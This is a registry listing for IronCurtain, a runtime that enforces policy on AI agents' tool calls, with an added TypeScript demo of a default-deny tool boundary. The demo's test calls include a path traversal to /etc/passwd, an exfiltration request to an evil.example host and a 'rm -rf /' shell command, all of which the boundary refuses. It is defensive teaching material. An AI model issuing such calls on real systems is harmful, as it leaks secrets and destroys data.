Skills · May 12, 2026 · 2 min read

IronCurtain — Secure Runtime for AI Agents

IronCurtain is a runtime boundary for agents: it treats the model as untrusted and enforces policy for tool calls, writes, and network effects.

Agent-ready

This asset can be read and installed directly by agents.

TokRepo exposes a universal CLI command, an install contract, JSON metadata, a per-adapter plan and the raw content so that agents can evaluate compatibility, risk and next steps.

Native · 98/100 · Policy: allow
Agent surface: Any MCP/CLI agent
Type: Skill
Installation: Single
Trust: Established
Entry: Asset
Universal CLI command: npx tokrepo install ac61bb7c-183a-4eee-b56a-03b97b61992d
Introduction

  • Best for: teams running autonomous agents who need enforced guardrails beyond prompt-level instructions
  • Works with: Node.js 22+, Docker (recommended), LLM provider API keys (Anthropic/Google/OpenAI)
  • Setup time: 18 minutes

Practical Notes

  • Enforces policy at the boundary (not by trusting the model to follow instructions)
  • Supports both a Docker-mediated mux mode and a builtin sandboxed mode (per README)
  • GitHub stars/forks (verified): see Source & Thanks

When an agent is autonomous, the biggest failure mode isn’t “bad answer” — it’s uncontrolled side effects.

IronCurtain’s framing is useful even if you don’t adopt it fully:

  • Assume the model is untrusted.
  • Put enforcement outside the model (policy engine + controlled tool boundary).
  • Make risky operations explicit and reviewable (writes, pushes, network calls).

A pragmatic adoption path:

  1. Use the built-in agent mode first for small tasks.
  2. Move to Docker-mediated mux mode when you want stronger isolation.
  3. Treat policies as code: version them, review them, and keep a default-deny posture for mutations.
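To make the three framing points and the adoption path above concrete (and the FAQ advice to lock down network access and writes first), here is an added example of a default-deny tool boundary in TypeScript. It is illustrative code written for this page, not IronCurtain's own code or API: the policy shape, the tool names, the approver hook and the in-memory stand-ins for the filesystem and network are all assumptions so that it runs offline.

```typescript
// Added illustrative example, not IronCurtain's code or API: a default-deny tool boundary between
// an untrusted model and real side effects. Policy shape, tool names, approver hook and the
// in-memory "filesystem"/"network" are assumptions made so the file runs offline.
import { posix as path } from "node:path";

type Effect = "read" | "write" | "network";
type Args = Record<string, string>;
interface ToolCall { tool: string; args: Args; }
interface ToolSpec { effects: Effect[]; run: (args: Args) => string; }
// Policy as data: version and review it like code. No matching rule means deny;
// "approve" routes the call through a human/escalation hook before it runs.
interface Rule { tool: string; decision: "allow" | "approve"; pathPrefix?: string; hostAllow?: string[]; }
interface Policy { version: number; rules: Rule[]; }
type Verdict = { kind: "allow" | "approve"; rule: Rule } | { kind: "deny"; reason: string };
interface Outcome { ok: boolean; output: string; }
interface AuditEntry { call: ToolCall; effects: Effect[]; verdict: Verdict["kind"]; detail: string; }

// The model controls the raw arguments: canonicalize once and use the SAME values for the
// policy check and the execution, so "/workspace/../etc/passwd" is tested as "/etc/passwd".
function canonicalize(call: ToolCall): ToolCall {
  const args: Args = { ...call.args };
  if (typeof args.path === "string") args.path = path.normalize(args.path);
  return { tool: call.tool, args };
}

function hostOf(url: string): string | null {
  try { return new URL(url).hostname; } catch { return null; }
}

// First matching rule wins; no match means deny.
function evaluate(policy: Policy, call: ToolCall): Verdict {
  for (const rule of policy.rules) {
    if (rule.tool !== call.tool) continue;
    if (rule.pathPrefix !== undefined && !(call.args.path ?? "").startsWith(rule.pathPrefix)) continue;
    if (rule.hostAllow !== undefined) {
      const host = hostOf(call.args.url ?? "");
      if (host === null || !rule.hostAllow.includes(host)) continue;
    }
    return { kind: rule.decision, rule };
  }
  return { kind: "deny", reason: `policy v${policy.version}: no rule permits ${call.tool} with these arguments` };
}

class ToolBoundary {
  readonly audit: AuditEntry[] = [];  // every decision, allowed or not, is recorded for review
  private readonly policy: Policy;
  private readonly tools: Record<string, ToolSpec>;
  private readonly approver: (call: ToolCall, why: string) => boolean;
  constructor(policy: Policy, tools: Record<string, ToolSpec>, approver: (call: ToolCall, why: string) => boolean) {
    this.policy = policy; this.tools = tools; this.approver = approver;
  }
  dispatch(raw: ToolCall): Outcome {
    const call = canonicalize(raw);
    const spec = this.tools[call.tool];
    if (spec === undefined) return this.record(call, [], "deny", `unknown tool ${call.tool}`);
    const verdict = evaluate(this.policy, call);
    if (verdict.kind === "deny") return this.record(call, spec.effects, "deny", verdict.reason);
    if (verdict.kind === "approve") {
      const why = `${call.tool} [${spec.effects.join(",")}] ${JSON.stringify(call.args)}`;
      if (!this.approver(call, why)) return this.record(call, spec.effects, "deny", `reviewer rejected: ${why}`);
    }
    return this.record(call, spec.effects, verdict.kind, spec.run(call.args), true);
  }
  private record(call: ToolCall, effects: Effect[], verdict: Verdict["kind"], detail: string, ok = false): Outcome {
    this.audit.push({ call, effects, verdict, detail });
    return { ok, output: detail };
  }
}

// Constructed stand-ins for the real filesystem and network; nothing touches disk or the wire.
const files = new Map<string, string>([["/workspace/notes.txt", "todo: rotate keys"]]);
const tools: Record<string, ToolSpec> = {
  read_file:  { effects: ["read"],    run: (a) => files.get(a.path ?? "") ?? "" },
  write_file: { effects: ["write"],   run: (a) => { files.set(a.path ?? "", a.content ?? ""); return "written"; } },
  http_get:   { effects: ["network"], run: (a) => `GET ${a.url} -> 200 (simulated)` },
};
const policy: Policy = {
  version: 3,
  rules: [
    { tool: "read_file",  decision: "allow",   pathPrefix: "/workspace/" },
    { tool: "write_file", decision: "approve", pathPrefix: "/workspace/" },
    { tool: "http_get",   decision: "approve", hostAllow: ["api.github.com"] },
  ],
};

// Constructed calls an untrusted model might emit: a normal read, a path traversal, a workspace
// write, a fetch from an allowed host, an exfiltration attempt, and a tool that does not exist.
function runDemo(): Outcome[] {
  const reviewer = (call: ToolCall) => call.tool !== "http_get";  // stand-in human: writes yes, network no
  const boundary = new ToolBoundary(policy, tools, reviewer);
  const calls: ToolCall[] = [
    { tool: "read_file",  args: { path: "/workspace/notes.txt" } },
    { tool: "read_file",  args: { path: "/workspace/../etc/passwd" } },
    { tool: "write_file", args: { path: "/workspace/out.txt", content: "draft" } },
    { tool: "http_get",   args: { url: "https://api.github.com/repos/provos/ironcurtain" } },
    { tool: "http_get",   args: { url: "https://evil.example/exfil?d=secret" } },
    { tool: "shell",      args: { cmd: "rm -rf /" } },
  ];
  const outcomes = calls.map((c) => boundary.dispatch(c));
  for (const e of boundary.audit) console.log(e.verdict.padEnd(7), e.call.tool.padEnd(10), e.detail);
  return outcomes;
}
runDemo();
```

Two design choices carry the security argument. The boundary, not the model, decides: the model only proposes a tool name and arguments, and nothing runs unless a rule in the versioned policy explicitly allows it or a reviewer approves it, so an unknown tool, a write outside the workspace, or a fetch to an unlisted host is refused without any prompt-level instruction. And the arguments are canonicalized exactly once and the same values are used for both the check and the execution, so a traversal like `/workspace/../etc/passwd` cannot pass the prefix test in one form and run in another. The audit list is what makes risky operations reviewable after the fact; in a real deployment it would be written somewhere the agent cannot modify.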

FAQ

Q: Is it a model or a wrapper? A: It’s a runtime/policy boundary that runs an agent and mediates tool calls.

Q: Do I need Docker? A: Docker is strongly recommended for the strongest isolation, but some modes run without it.

Q: What should I lock down first? A: Network access and write operations: make them explicit and require approval/escalation.

Source & Thanks

Source: https://github.com/provos/ironcurtain · License: Apache-2.0 · GitHub stars: 399 · forks: 52
